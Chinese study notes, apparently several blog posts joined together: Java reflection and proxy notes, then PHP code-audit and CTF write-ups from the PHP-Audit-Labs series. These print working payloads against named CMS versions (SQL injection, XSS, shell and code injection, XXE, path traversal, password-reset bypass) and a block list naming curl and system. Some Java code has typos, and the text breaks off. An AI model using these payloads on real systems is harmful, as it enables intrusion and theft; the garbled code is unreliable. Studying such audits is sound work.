
Fruit fruit = new Fruit("水果");
fruitHolder.setObj(fruit)

先实例化再传入对象，参考如下：

Java泛型再探——泛型通配符及上下边界

泛型数组

• 不可以

List<String>[] ls = new ArrayList<String>[10];  

• 可以

List<?>[] ls = new ArrayList<?>[10]; 
List<String>[] ls = new ArrayList[10];

代理

静态代理

抽象角色：一般会使用接口或抽象类来解决
真实角色：被代理的角色
代理角色：代理真实角色后，我们一般会做一些附属操作
客户：访问代理对象的人

• 抽象角色

//接口——》租房
public interface Rent {

    public void rent();
}

• 真实角色

//真实角色->房东
public class Host implements Rent{
    @Override
    public void rent(){
        System.out.println("房东要出租房子");
    }
}

• 代理角色

package ChaBugStudy;

public class Proxy implements Rent{

      private Host host;

      public Proxy(){

      }
      public Proxy(Host host){
          this.host = host;
      }

      public void rent(){
            seeHouse();
            host.rent();
            hetong();
            fare();
      }

      //看房

      public void seeHouse(){
            System.out.println("中介带你看房");
      }

      public void hetong(){
            System.out.println("签合同吧！");
      }
      //收中介费

      public void fare(){
            System.out.println("这房子不错，阔绰的你决定给点小费");
      }

}

• 客户端访问代理角色

public class Clinet {

    public static void main(String[] args) {
        Host host = new Host();
        Proxy proxy = new Proxy(host);

        proxy.rent();
    }
}

• 运行一下看看效果

• 缺点

一个真实对象需要产生一个代理

动态代理（先留着看完反射再看）

• 动态代理（这里是基于JDK动态代理）

一个动态代理类可以代理多个类，只要是实现了同一个接口

• 抽象角色

public interface Rent {

   public void rent();
}

• 真实角色

public class Host implements Rent{

    public void rent(){
        System.out.println("房东要出租房子！");
    }
}

• 代理角色

import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Method;
import java.lang.reflect.Proxy;

public class Proxyhandler implements InvocationHandler {

    //被代理的接口

    Rent rent;
    public void setRent(Rent rent){
        this.rent = rent;
    }

    //生成得到代理类

    public Object getProxy(){
        return Proxy.newProxyInstance(this.getClass().getClassLoader(),rent.getClass().getInterfaces(),this);
    }

    // 处理代理实例，并返回结果

    public Object invoke(Object proxy, Method method,Object[] args) throws Throwable{
        Object result = method.invoke(rent,args);
        return result;
    }
}

• 客户端（客户）角色

import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Method;

public class Clent {

    public static void main(String[] args) {
        //真实角色
        Host host = new Host();
        //代理角色

        Proxyhandler pih = new Proxyhandler();
        //通过调用程序处理角色来处理要调用的接口角色

        pih.setRent(host);

        Rent proxy = (Rent) pih.getProxy();

        proxy.rent();
    }
}

注解（Java.Annotation）

• 格式

@注释名

• 内置注解

@Override

定义在java.lang.Override中，表示重写

Deprecated 

定义在java.lang.Deprecated中，表示废弃，不鼓励使用，使用时会多一条横线，但依旧可以使用

@SuppressWarnings 

定义在java.lang.SuppressWarnings中，用来抑制编译时的警告信息

使用前

使用后

元注解

• 作用

注解其他注解

• @Target(用于描述注解的使用范围)

@MYAnnotation
public class ZhuJie {

    @MYAnnotation
    public static void main(String[] args) {

    }


}

//METHOD 方法、TYPE 类
@Target(value = {ElementType.METHOD,ElementType.TYPE})
@interface MYAnnotation{

}

• @Retention(表示需要在什么级别保存该注释信息，用来描述注解的生命周期（SOURCE < CLASS < RUNTime）)

@Retention(value = RetentionPolicy.RUNTIME)

• @Document(说明该注释将被包含在javadoc中)
• @Inherited(说明该子类可以继承父类中的该注解)

自定义注解

• @interface(自定义注解关键字)

• 格式

public @interface 注解名{定义内容}

• 自定义注解

package ChaBugStudy;


import java.lang.annotation.ElementType;
import java.lang.annotation.Retention;
import java.lang.annotation.RetentionPolicy;
import java.lang.annotation.Target;

@Syst1m(Team = "ChaBUg",Founder = "Y4er",brother = "syle")
public class ZhuJie {
    @Syst1m
    public static void main(String[] args) {
        System.out.println("ChaBug.Org");
    }


}


@Target(value = {ElementType.TYPE,ElementType.METHOD})
@Retention(RetentionPolicy.RUNTIME)
@interface Syst1m{

    String Team() default "ChaBug";
    String Founder() default "Y4er";
    String brother() default "Syle";

}

反射（Reflection）

• 正常方式

引入需要的“包类”名称-）通过new实例化-〉取得实例化对象

• 反射方式

实例化对象->getclass()方法->取得完整的“包类”名称

• 优缺点

可以实现动态创建对象和编译，体现出很大的灵活性。

对性能有影响，慢于直接操作

• 主要API

java.lang.class  代表一个类
java.lang.reflect.Method  代表类的方法
java.lang.reflect.Field 代表类的成员变量
java.lang.reflect.Constructor 代表类的构造器

• 获取class类的几种方式

常用方法

package ChaBugStudy;

public class Reflection {
    public static void main(String[] args) throws ClassNotFoundException {
        Person person = new Student();

        //方式一：通过对象获得
        Class c1 = person.getClass();
        System.out.println(c1.hashCode());

        //方式二：forname获得

        Class c2 = Class.forName("ChaBugStudy.Person");
        System.out.println(c2.hashCode());

        //方式三 通过类名.class

        Class c3 = Person.class;
        System.out.println(c3.hashCode());

        //方式四 内置类型的包装类

        Class c4 = Integer.TYPE;
        System.out.println(c4.hashCode());

        //获取父类

        Class c5 = c1.getSuperclass();
        System.out.println(c5.hashCode());

    }
}

class Person{
    String name;

    public Person(){

    }

    public Person(String name){

    }

    @Override
    public String toString(){
        return name;
    }
}

class Student extends Person{
    public Student(){
        this.name = "学生";
        }
}


class Teacher extends Person{
    public Teacher(){
        this.name = "老师";
        }
}

• 哪些类型可以有Class对象

**
class
interface接口
[]数组
enum枚举
注解@interface
基本数据类型
void
**

    Class c1 = Object c1 = Object.class; //类
    Class c2 = Comparable.class; //接口
    Class c3 = String[].class; //数组
    Class c4 = Override.class; //注解
    Class c5= ElementType.class; // 枚举
    Class c6 = Integer.class; // 基本数据
    Class c7 = void.class; //void
    Class c8 = Class.class; //CLass

• 获取运行时类的完整结构

获取类的名字

c1.getName() 获取包名加类名
c1.getSimpleName() 获得类名

获得类的属性

Field[] field = c1.getFields() 只能获取public属性
fields = c1.getDeclaredFields() 找到全部的属性

获得指定属性的值

Field name = c1.getDeclaredField("name")

获得类的方法

Method[] methods = c1.getMethods(); 获得本类以及父类的全部public方法

methods = c1.getDeclaredMethods(); 获得本类的所有方法

获得指定方法

Method getname = c1.getMethod("getname",null)
Method serName = c1.getMethod("setname",String.class)

获得构造器

Constructor[] constructors = c1.getConstructors();
for (Constructor constructor:constructors){
    System.out.println(construcior)}

constructors = c1.getDeclaredConstructors();

获得指定构造器

c1.getDeclaredConstructor(String.class,int.class)

• 动态创建对象执行方法

获得对象

Class c1 = Class.forname("XXX")

构造对象

User user = (User) c1.nerInstance(); 无参构造器

通过构造器创建对象

Constructor constructor = c1.getDeclaredConstructor(String.class)
User user2 = (USer)constructor.nerInstance("Syst1m")

反射调用普通方法

User user3 = (User)c1.nerInstance();
Method serName = c1.getDeclaredMethod("setName",Strind.class);
setName.invoke(User3,"syst1m");

反射操作属性

不能直接操作私有属性，需要关闭安全检测

User user4 = (User)c1.nerInstance();
Field name = c1.getDeclaredFields();

name.setAccessible(true) //关闭权限检测
name.set(User4,"syst1m");

• 参考

https://blog.csdn.net/lililuni/article/details/83449088

Frost Pattern

• code

class TokenStorage {
  public function performAction($action, $data) {
    switch ($action) {
      case 'create':
        $this->createToken($data);
        break;
      case 'delete':
        $this->clearToken($data);
        break;
      default:
        throw new Exception('Unknown action');
    }
  }

  public function createToken($seed) {
    $token = md5($seed);
    file_put_contents('/tmp/tokens/' . $token, '...data');
  }

  public function clearToken($token) {
    $file = preg_replace("/[^a-z.-_]/", "", $token);
    unlink('/tmp/tokens/' . $file);
  }
}

$storage = new TokenStorage();
$storage->performAction($_GET['action'], $_GET['data']);

• preg_replace(函数执行一个正则表达式的搜索和替换)

• payload

$action = $delete$data = ../../config.php

WeEngine0.8

• web/source/site/category.ctrl.php:176

file_delete文件删除函数

• framework/function/file.func.php:294

查看file_delete函数

• 追朔$file变量从何而来

if (!empty($navs)) {
        foreach ($navs as $row) {
            file_delete($row['icon']);
        }

• 追朔$navs从何而来

    $navs = pdo_fetchall("SELECT icon, id FROM ".tablename('site_nav')." WHERE id IN (SELECT nid FROM ".tablename('site_category')." WHERE id = {$id} OR parentid = '$id')", array(), 'id');

• web/source/site/category.ctrl.php:137

• web/source/site/category.ctrl.php:130

$nav[‘icon’] 即为文件删除函数的参

parse_str函数缺陷

• parse_str

parse_str的作用就是解析字符串并且注册成变量，它在注册变量之前不会验证当前变量是否存在，所以会直接覆盖掉当前作用域中原有的变量。

preg_replace函数之命令执行

Candle

• code

header("Content-Type: text/plain");

function complexStrtolower($regex, $value) {
  return preg_replace(
    '/(' . $regex . ')/ei',
    'strtolower("\\1")',
    $value
  );
}

foreach ($_GET as $regex => $value) {
  echo complexStrtolower($regex, $value) . "\n";
}

• preg_replace(函数执行一个正则表达式的搜索和替换)

mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] )

$pattern 存在 /e 模式修正符，允许代码执行
/e 模式修正符，是 preg_replace() 将 $replacement 当做php代码来执行

将GET请求传过来的参数通过complexStrtolower函数执行，preg_replace函数存在e修正符

• payload

S*=${phpinfo()} 

参考

深入研究preg_replace与代码执行

CmsEasy 5.5

• 环境搭建

漏洞分析

• lib/tool/form.php:90

如果$form[$name][‘default’]内容被匹配到就会执行eval

• cache/template/default/manage/#guestadd.php:175

全局搜索getform，主要注意catid是作为$name的

• lib/table/archive.php:25

追朔catid,寻找到default

• lib/tool/front_class.php:2367

• lib/tool/front_class.php:493

• lib/tool/front_class.php:332

$form[$name][‘default’]可控

• lib/default/manage_act.php:29

• 测试

str_replace函数过滤不当

Rabbit

• code

class LanguageManager {
  public function loadLanguage() {
    $lang = $this->getBrowserLanguage();
    $sanitizedLang = $this->sanitizeLanguage($lang);
    require_once("/lang/$sanitizedLang");
  }

  private function getBrowserLanguage() {
    $lang = $_SERVER['HTTP_ACCEPT_LANGUAGE'] ?? 'en';
    return $lang;
  }

  private function sanitizeLanguage($language) {
    return str_replace('../', '', $language);
  }
}

(new LanguageManager())->loadLanguage();

• str_replace(子字符串替换)

str_replace(字符串1，字符串2，字符串3)：将字符串3中出现的所有字符串1换成字符串2。

str_replace(数组1，字符串1，字符串2)：将字符串2中出现的所有数组1中的值，换成字符串1。

str_replace(数组1，数组2，字符串1)：将字符串1中出现的所有数组1一一对应，替换成数组2的值，多余的替换成空字符串。

• payload

....// 或者 ..././ 

Metinfo 6.0.0

• strstr

查找字符串的首次出现到结尾的字符串

漏洞分析

• app/system/include/module/old_thumb.class.php:14

• include/thumb.php:6

全局搜索

• app/system/include/class/load.class.php:113

• payload

http://localhost/metInfo/include/thumb.php?dir=.....///http/.....///最终用户授权许可协议.txt

程序未恰当exit导致的问题

Anticipation

• code

extract($_POST);

function goAway() {
  error_log("Hacking attempt.");
  header('Location: /error/');
}

if (!isset($pi) || !is_numeric($pi)) {
  goAway();
}

if (!assert("(int)$pi == 3")) {
  echo "This is not pi.";
} else {
  echo "This might be pi.";
}

• extract

从数组中将变量导入到当前的符号表

• payload

pl=phpinfo()

• 测试

FengCms 1.32

• install/index.php

如果安装完成会生成INSTALL文件，访问文件如果存在此文件则会弹窗提示退出，但没有及时exit，导致程序逻辑还是往下走，还是会安装

Simple-Log1.6网站重装漏洞

• install/index.php

访问文件如果存在此文件则会弹窗提示退出，但没有及时exit，只是跳转到首页，导致程序逻辑还是往下走，还是会安装

Tips整理

• parse_str

parse_str的作用就是解析字符串并且注册成变量，它在注册变量之前不会验证当前变量是否存在，所以会直接覆盖掉当前作用域中原有的变量

• preg_replace

$pattern 存在 /e 模式修正符，允许代码执行
/e 模式修正符，是 preg_replace() 将 $replacement 当做php代码来执行

• extract

从数组中将变量导入到当前的符号表

• 尾声

本系列是弟弟跟着红日安全产出的代码审计教程系列学习的，原项目地址：[PHP-Audit-Labs]

(https://github.com/hongriSec/PHP-Audit-Labs)

Wish List

• Code

class Challenge {
  const UPLOAD_DIRECTORY = './solutions/';
  private $file;
  private $whitelist;

  public function __construct($file) {
    $this->file = $file;
    $this->whitelist = range(1, 24);
  }

  public function __destruct() {
    if (in_array($this->file['name'], $this->whitelist)) {
      move_uploaded_file(
        $this->file['tmp_name'],
        self::UPLOAD_DIRECTORY . $this->file['name']
      );
    }
  }
}

$challenge = new Challenge($_FILES['solution']);

• 代码理解

代码为一个文件上传的代码，如果文件名存在于1-24中，则上传文件

• in_array函数

in_array
检查数组中是否存在某个值

• 题解

php弱类型比较时，6php会转换为6，6在1-24中间，所以可以进行上传

piwigo2.7.1实例分析

• 环境搭建

漏洞分析

• 于picture.php:332中

case 'rate' :
    {
      include_once(PHPWG_ROOT_PATH.'include/functions_rate.inc.php');
      rate_picture($page['image_id'], $_POST['rate']);
      redirect($url_self);
    }

当case为rate时，将变量rate和变量image_id传入functions_rate.inc.php文件中的rate_picture函数

• include/functions_rate.inc.php:38

or !in_array($rate, $conf['rate_items']))

查找变量rate是否存在于$conf[‘rate_items’]当中

$conf['rate_items']

• 直接将rate进行了拼接

$query = '
INSERT
  INTO '.RATE_TABLE.'
  (user_id,anonymous_id,element_id,rate,date)
  VALUES
  ('
    .$user['id'].','
    .'''.$anonymous_id.'','
    .$image_id.','
    .$rate
    .',NOW())
;';
  pwg_query($query);

  return update_rating_score($image_id);
}
$query = '
INSERT
  INTO '.RATE_TABLE.'
  (user_id,anonymous_id,element_id,rate,date)
  VALUES
  ('
    .$user['id'].','
    .'''.$anonymous_id.'','
    .$image_id.','
    .$rate
    .',NOW())
;';
  pwg_query($query);

  return update_rating_score($image_id);
}

只要rate为array(0,1,2,3,4,5)便可以进行绕过，而in_array第三位未设置为true

• payload

1,1 and if(ascii(substr((select database()),1,1))=112,1,sleep(3)));# 

• sqlmap

CTF

• 环境搭建

• stop_hack函数

function stop_hack($value){
    $pattern = "insert|delete|or|concat|concat_ws|group_concat|join|floor|/*|*|../|./|union|into|load_file|outfile|dumpfile|sub|hex|file_put_contents|fwrite|curl|system|eval";
    $back_list = explode("|",$pattern);
    foreach($back_list as $hack){
        if(preg_match("/$hack/i", $value))
            die("$hack detected!");
    }
    return $value;
}

stop_hack用来过滤一些危险函数

• 注入

获取get的ID，通过stop_hack进行过滤并拼接到sql语句中进行查询

• 报错注入payload

and (select updatexml(1,make_set(3,'~',(select flag from flag)),1))

• 参考

https://github.com/hongriSec/PHP-Audit-Labs/blob/master/PHP-Audit-Labs%E9%A2%98%E8%A7%A3/Day1-4/files/README.md
https://xz.aliyun.com/t/2160

filter_var函数缺陷

Twig

// composer require "twig/twig"
require 'vendor/autoload.php';

class Template {
  private $twig;

  public function __construct() {
    $indexTemplate = '<img ' .
      'src="https://loremflickr.com/320/240">' .
      '<a href="{{link|escape}}">Next slide &raquo;</a>';

    // Default twig setup, simulate loading
    // index.html file from disk
    $loader = new TwigLoaderArrayLoader([
      'index.html' => $indexTemplate
    ]);
    $this->twig = new TwigEnvironment($loader);
  }

  public function getNexSlideUrl() {
    $nextSlide = $_GET['nextSlide'];
    return filter_var($nextSlide, FILTER_VALIDATE_URL);
  }

  public function render() {
    echo $this->twig->render(
      'index.html',
      ['link' => $this->getNexSlideUrl()]
    );
  }
}

(new Template())->render();

使用escape和filter_var进行过滤

• escape

默认是使用了htmlspecialchars方法进行过滤，

• filter_var

使用特定的过滤器过滤一个变量
mixed filter_var ( mixed $variable [, int $filter = FILTER_DEFAULT [, mixed $options ]] )

• htmlspecialchars转义

& (& 符号)  ===============  &
" (双引号)  ===============  "
' (单引号)  ===============  '
< (小于号)  ===============  &lt;
> (大于号)  ===============  &gt;

默认只过滤双引号，不过滤单引号，只有设置了：quotestyle 选项为ENT_QUOTES才会过滤单引号

• payload

javascript://comment%250aalert(1)

anchor-cms

• 环境搭建

源码分析

• themes/default/404.php:9

• anchor/functions/helpers.php:34 current_url()函数

function current_url() {
    return Uri::current();
}

• system/uri.php:84

public static function current() {
        if(is_null(static::$current)) static::$current = static::detect();
        return static::$current;
    }

• detect 方法

public static function detect() {
        // create a server object from global
        $server = new Server($_SERVER);

        $try = array('REQUEST_URI', 'PATH_INFO', 'ORIG_PATH_INFO');

        foreach($try as $method) {

            // make sure the server var exists and is not empty
            if($server->has($method) and $uri = $server->get($method)) {

                // apply a string filter and make sure we still have somthing left
                if($uri = filter_var($uri, FILTER_SANITIZE_URL)) {

                    // make sure the uri is not malformed and return the pathname
                    if($uri = parse_url($uri, PHP_URL_PATH)) {
                        return static::format($uri, $server);
                    }

                    // woah jackie, we found a bad'n
                    throw new ErrorException('Malformed URI');
                }
            }
        }

        throw new OverflowException('Uri was not detected. Make sure the REQUEST_URI is set.');
    }

关键代码

if($uri = filter_var($uri, FILTER_SANITIZE_URL)) {

                    // make sure the uri is not malformed and return the pathname
                    if($uri = parse_url($uri, PHP_URL_PATH)) {
                        return static::format($uri, $server);
                    }

                    // woah jackie, we found a bad'n
                    throw new ErrorException('Malformed URI');

• system/uri.php:126

    public static function format($uri, $server) {
        // Remove all characters except letters,
        // digits and $-_.+!*'(),{}|\^~[]`<>#%";/?:@&=.
        $uri = filter_var(rawurldecode($uri), FILTER_SANITIZE_URL);

        // remove script path/name
        $uri = static::remove_script_name($uri, $server);

        // remove the relative uri
        $uri = static::remove_relative_uri($uri);

        // return argument if not empty or return a single slash
        return trim($uri, '/') ?: '/';
    }

没有对xss进行过滤

• payload

http://localhost:8888/test/index.php/%3Cscript%3Ealert(1)%3C/script%3E

CTF

• 环境搭建

• flag.php

<?php  
$flag = "HRCTF{f1lt3r_var_1s_s0_c00l}"
?>

• index.php

<?php 
$url = $_GET['url']; // 获取url

if(isset($url) && filter_var($url, FILTER_VALIDATE_URL)){  //过滤url
    $site_info = parse_url($url);

    if(preg_match('/sec-redclub.com$/',$site_info['host'])){ //以sec-redclub.com结尾
        exec('curl "'.$site_info['host'].'"', $result);
        echo "<center><h1>You have curl {$site_info['host']} successfully!</h1></center>
              <center><textarea rows='20' cols='90'>";
        echo implode(' ', $result);
    } //命令执行

    else{
        die("<center><h1>Error: Host not allowed</h1></center>");
    }

}
else{
    echo "<center><h1>Just curl sec-redclub.com!</h1></center><br>
          <center><h3>For example:?url=http://sec-redclub.com</h3></center>";
}
?>

• payload

syst1m://"|ls;"sec-redclub.com
syst1m://"|cat<f1agi3hEre.php;"sec-redclub.com

实例化任意对象漏洞

Snow Flake

• code

function __autoload($className) { //自动加载
  include $className;
}

$controllerName = $_GET['c'];
$data = $_GET['d'];  //获取get的c与d作为类名与参数

if (class_exists($controllerName)) {
  $controller = new $controllerName($data['t'], $data['v']);
  $controller->render();
} else {
  echo 'There is no page with this name';
}

class HomeController {
  private $template;
  private $variables;

  public function __construct($template, $variables) {
    $this->template = $template;
    $this->variables = $variables;
  }

  public function render() {
    if ($this->variables['new']) {
      echo 'controller rendering new response';
    } else {
      echo 'controller rendering old response';
    }
  }
}

如果存在如果程序存在 __autoload函数，class_exists函数就会自动调用方法

• payload

/?c=../../../../etc/passwd

Shopware 5.3.3 （XXE）

• 环境搭建

代码分析

• 漏洞触发点

• 打断点

• engine/Shopware/Controllers/Backend/ProductStream.php:52

• engine/Shopware/Controllers/Backend/ProductStream.php:63

使用$this->Request()->getParam(‘sort’)获取sort，然后进入RepositoryInterface类的unserialize方法

• engine/Shopware/Components/LogawareReflectionHelper.php:56

调用的是LogawareReflectionHelper类的unserialize方法

$serialized为传入的sort变量，遍历取出className，传入createInstanceFromNamedArguments方法

• engine/Shopware/Components/ReflectionHelper.php:40

新建一个反射类，并传入参数，类名与参数都为sort中的，而sort可控

• 发送到burp

• 修改payload

/test/backend/ProductStream/loadPreview?_dc=1583825465339&sort={"data":"http://localhost/xxe.xml","options":2,"data_is_url":1,"ns":"","is_prefix":0}}&conditions={}&shopId=1&currencyId=1&customerGroupKey=EK&page=1&start=0&limit=25

• 测试

• 参考

https://www.php.net/manual/zh/simplexmlelement.construct.php

CTF

• code

<?php

class NotFound{
    function __construct()
    {
        die('404');
    }
}
spl_autoload_register(
    function ($class){
        new NotFound();
    }
);

$classname = isset($_GET['name']) ? $_GET['name'] : null;
$param = isset($_GET['param']) ? $_GET['param'] : null;
$param2 = isset($_GET['param2']) ? $_GET['param2'] : null;
if(class_exists($classname)){
    $newclass = new $classname($param,$param2);
    var_dump($newclass);
    foreach ($newclass as $key=>$value)
        echo $key.'=>'.$value.'<br>';
}

当class_exists时，调用__autoload方法，但是__autoload方法不存在，新建了一个spl_autoload_register方法，类似__autoload方法

• 列出文件（GlobIterator类）

public GlobIterator::__construct ( string $pattern [, int $flags = FilesystemIterator::KEY_AS_PATHNAME | FilesystemIterator::CURRENT_AS_FILEINFO ] )

第一个参数为要搜索的文件名，第二个参数为第二个参数为选择文件的哪个信息作为键名

• payload

http://127.0.0.1:8888/index.php?name=GlobIterator&param=./*.php&param2=0

• 读取flag

http://127.0.0.1:8888/index.php?name=SimpleXMLElement&param=%3C?xml%20version=%221.0%22?%3E%3C!DOCTYPE%20ANY%20[%3C!ENTITY%20xxe%20SYSTEM%20%22php://filter/read=convert.base64-encode/resource=f1agi3hEre.php%22%3E]%3E%3Cx%3E%26xxe;%3C/x%3E&param2=2

– 参考

https://www.php.net/manual/en/function.spl-autoload-register.php

strpos使用不当引发漏洞

False Beard

• code

class Login {
  public function __construct($user, $pass) {
    $this->loginViaXml($user, $pass);
  }

  public function loginViaXml($user, $pass) {
    if (
      (!strpos($user, '<') || !strpos($user, '>')) &&
      (!strpos($pass, '<') || !strpos($pass, '>'))
    ) {
      $format = '<?xml version="1.0"?>' .
        '<user v="%s"/><pass v="%s"/>';
      $xml = sprintf($format, $user, $pass);
      $xmlElement = new SimpleXMLElement($xml);
      // Perform the actual login.
      $this->login($xmlElement);
    }
  }
}

new Login($_POST['username'], $_POST['password']);

• strpos

主要是用来查找字符在字符串中首次出现的位置。

查找代码中是否含有<与>的特殊符号，strpos在没找到指定字符时会返回flase，如果第一个字符找到就返回0，0的取反为1，就可以注入xml进行注入了

• payload

user=<"><injected-tag property="&pass=<injected-tag>

DeDecms V5.7SP2任意密码重置漏洞

• 环境搭建

• 开启会员登陆并且注册两个会员

• member/resetpassword.php:75 漏洞触发点

else if($dopost == "safequestion")
{
    $mid = preg_replace("#[^0-9]#", "", $id);
    $sql = "SELECT safequestion,safeanswer,userid,email FROM #@__member WHERE mid = '$mid'";
    $row = $db->GetOne($sql);
    if(empty($safequestion)) $safequestion = '';

    if(empty($safeanswer)) $safeanswer = '';

    if($row['safequestion'] == $safequestion && $row['safeanswer'] == $safeanswer)
    {
        sn($mid, $row['userid'], $row['email'], 'N');
        exit();
    }
    else
    {
        ShowMsg("对不起，您的安全问题或答案回答错误","-1");
        exit();
    }

}

将传入的mid进行查询，查询用户查询对应用户的安全问题、安全答案、用户id、电子邮件等信息，然后当安全问题和答案不为空且等于之前的设置的问题和答案的时候，进入sn函数

• 查看数据表

当没设置问题答案时，safequestion为0，safeanswer为null，语句变为了

if($row['safequestion'] == $safequestion && $row['safeanswer'] == $safeanswer)

$row['safequestion'] == 0 
$row['safeanswer'] == null

if ('0' == ''& null == ''){
    sn()
}

 if(false && true)

• member/inc/inc_pwd_functions.php:150

• member/inc/inc_pwd_functions.php:73

进入newmail函数

如果$send == ‘N’则发送重置邮件

sendmail($mailto,$mailtitle,$mailbody,$headers);

/resetpassword.php?dopost=getpasswd&id=".$mid."&key=".$randval

• member/resetpassword.php:96

如果$id为空则退出，如果row不为空，则执行

    if(empty($setp))
    {
        $tptim= (60*60*24*3);
        $dtime = time();
        if($dtime - $tptim > $row['mailtime'])
        {
            $db->executenonequery("DELETE FROM `#@__pwd_tmp` WHERE `md` = '$id';");
            ShowMsg("对不起，临时密码修改期限已过期","login.php");
            exit();
        }
        require_once(dirname(__FILE__)."/templets/resetpassword2.htm");
    }

• member/templets/resetpassword2.htm:95

<input type="hidden" name="dopost" value="getpasswd">
<input type="hidden" name="setp" value="2">
<input type="hidden" name="id" value="<?php echo $id;?>" />

将setp的属性设置为2

• member/resetpassword.php:123

elseif($setp == 2) 
    {
        if(isset($key)) $pwdtmp = $key;

        $sn = md5(trim($pwdtmp));
        if($row['pwd'] == $sn)
        {
            if($pwd != "")
            {
                if($pwd == $pwdok)
                {
                    $pwdok = md5($pwdok);
                    $sql = "DELETE FROM `#@__pwd_tmp` WHERE `mid` = '$id';";
                    $db->executenonequery($sql);
                    $sql = "UPDATE `#@__member` SET `pwd` = '$pwdok' WHERE `mid` = '$id';";
                    if($db->executenonequery($sql))
                    {
                        showmsg('更改密码成功，请牢记新密码', 'login.php');
                        exit;
                    }
                }
            }
            showmsg('对不起，新密码为空或填写不一致', '-1');
            exit;
        }
        showmsg('对不起，临时密码错误', '-1');
        exit;
    }

如果key等于$row[‘pwd’]，则重置密码成功

漏洞验证

• 访问重置密码链接获取key

member/resetpassword.php?dopost=safequestion&safequestion=0.0&safeanswer=&id=3

• 重置密码

member/resetpassword.php?dopost=getpasswd&id=3&key=VeRkLvEU

CTF

• 环境搭建

• buy.php

<script type="text/javascript" src="js/buy.js"></script>

• bug.js

function buy(){
    $('#wait').show();
    $('#result').hide();
    var input = $('#numbers')[0];
    if(input.validity.valid){
        var numbers = input.value;
        $.ajax({
          method: "POST",
          url: "api.php",
          dataType: "json",
          contentType: "application/json", 
          data: JSON.stringify({ action: "buy", numbers: numbers })
        }).done(function(resp){
            if(resp.status == 'ok'){
                show_result(resp);
            } else {
                alert(resp.msg);
            }
        })
    } else {
        alert('invalid');
    }
    $('#wait').hide();
}

将用户提交的数字传入到api.php的buy函数

• api.php

    for($i=0; $i<7; $i++){
        if($numbers[$i] == $win_numbers[$i]){
            $same_count++;
        }
    }

由于是==，可进行弱类型比较，传入7个true

• payload

[true,true,true,true,true,true,true]

• 购买flag

escapeshellarg与escapeshellcmd使用不当

escapeshellcmd: 除去字串中的特殊符号
escapeshellarg 把字符串转码为可以在 shell 命令里使用的参数

postcard

• code

class Mailer {
  private function sanitize($email) {
    if (!filter_var($email, FILTER_VALIDATE_EMAIL)) {
      return '';
    }

    return escapeshellarg($email);
  }

  public function send($data) {
    if (!isset($data['to'])) {
      $data['to'] = 'none@ripstech.com';
    } else {
      $data['to'] = $this->sanitize($data['to']);
    }

    if (!isset($data['from'])) {
      $data['from'] = 'none@ripstech.com';
    } else {
      $data['from'] = $this->sanitize($data['from']);
    }

    if (!isset($data['subject'])) {
      $data['subject'] = 'No Subject';
    }

    if (!isset($data['message'])) {
      $data['message'] = '';
    }

    mail($data['to'], $data['subject'], $data['message'],
      '', "-f" . $data['from']);
  }
}

$mailer = new Mailer();
$mailer->send($_POST);

新建一个MAil类进行邮件发送

• Php内置函数mail

bool mail (
    string $to , 接收人
    string $subject , 邮件标题
    string $message [, 征文
    string $additional_headers [, 额外头部
    string $additional_parameters ]] 额外参数
)

• Linux中的额外参数

-O option = value

QueueDirectory = queuedir 选择队列消息

-X logfile

这个参数可以指定一个目录来记录发送邮件时的详细日志情况。

-f from email

这个参数可以让我们指定我们发送邮件的邮箱地址。

• 举个例子（原文图）

• 结果

17220 <<< To: Alice@example.com
 17220 <<< Subject: Hello Alice!
 17220 <<< X-PHP-Originating-Script: 0:test.php
 17220 <<< CC: somebodyelse@example.com
 17220 <<<
 17220 <<< <?php phpinfo(); ?>
 17220 <<< [EOF]

• filter_var()问题（FILTER_VALIDATE_EMAIL）

filter_var() 问题在于，我们在双引号中嵌套转义空格仍然能够通过检测。同时由于底层正则表达式的原因，我们通过重叠单引号和双引号，欺骗 filter_val() 使其认为我们仍然在双引号中，这样我们就可以绕过检测。

”aaa’aaa”@example.com

• escapeshellcmd() 和 escapeshellarg()（会造成特殊字符逃逸）

• 逃逸过程分析

$param = "127.0.0.1' -v -d a=1";
$a = escapeshellcmd($param);
$b = escapeshellarg($a);
$cmd = "curl".$b;
var_dump($a)."n";
var_dump($b)."n";
var_dump($cmd)."n";
system($cmd);

传入127.0.0.1′ -v -d a=1，escapeshellarg首先进行转义，处理为’127.0.0.1”’ -v -d a=1’，接着escapeshellcmd处理，处理结果为’127.0.0.1’\” -v -d a=1′,\ 被解释成了 而不再是转义字符

参考

https://www.leavesongs.com/PENETRATION/some-tricks-of-attacking-lnmp-web-application.html

Tips整理

• in_array

第三个参数未设置为true,可利用弱类型比较绕过

• filter_var（url过滤）

未对协议进行校验，可利用xxx://绕过

• class_exists

当存在__autoload函数，会自动调用，如果类名可控，可造成危害，如果参数也可控，可利用内部函数进行攻击。

• strpos

strpos在没找到指定字符时会返回flase，如果第一个字符找到就返回0

• filter_var (FILTER_VALIDATE_EMAIL)

filter_var() 问题在于，我们在双引号中嵌套转义空格仍然能够通过检测。同时由于底层正则表达式的原因，我们通过重叠单引号和双引号，欺骗 filter_val() 使其认为我们仍然在双引号中，这样我们就可以绕过检测。
”aaa’aaa”@example.com

• escapeshellarg与escapeshellcmd

escapeshellarg与escapeshellcmd配合使用会存在绕过

• 尾声

本系列是弟弟跟着红日安全产出的代码审计教程系列学习的，原项目地址：[PHP-Audit-Labs]

(https://github.com/hongriSec/PHP-Audit-Labs)

我是一个喜欢记笔记写文章的菜鸡，而使用markdown记笔记最蛋疼的就是图片的存储问题，刚开始使用的是PicGo，可以直接截图然后粘贴就是markdown的图片语法，但是使用的是第三方的图床。

而我自己原来用第三方图床也就是新浪的图床，后来新浪一波防盗链把我搞得骂骂咧咧措手不及，想了想，图片还是掌握在自己手中比较好，于是就有了本文。

借助PicGo搞插件？

刚好自己搭了一个图床http://static.chabug.org/ ，想着参考PicGo的思路，自己写一个插件，然后实现截图 快捷键 粘贴 一套操作，岂不是美滋滋？后来看到了PicGo需要装nodejs才能用插件，再想想nodejs的依赖和蛇皮语法，直接实力劝退，不了了之。

python自己造轮子

国光师傅写过一篇Python 编写一个免费简单的图床上传工具二，但是编写思路是采用xclip来操作ubuntu下的剪切板，而苦逼windows党不配这样操作。随卒。

参考PicGo自己撸

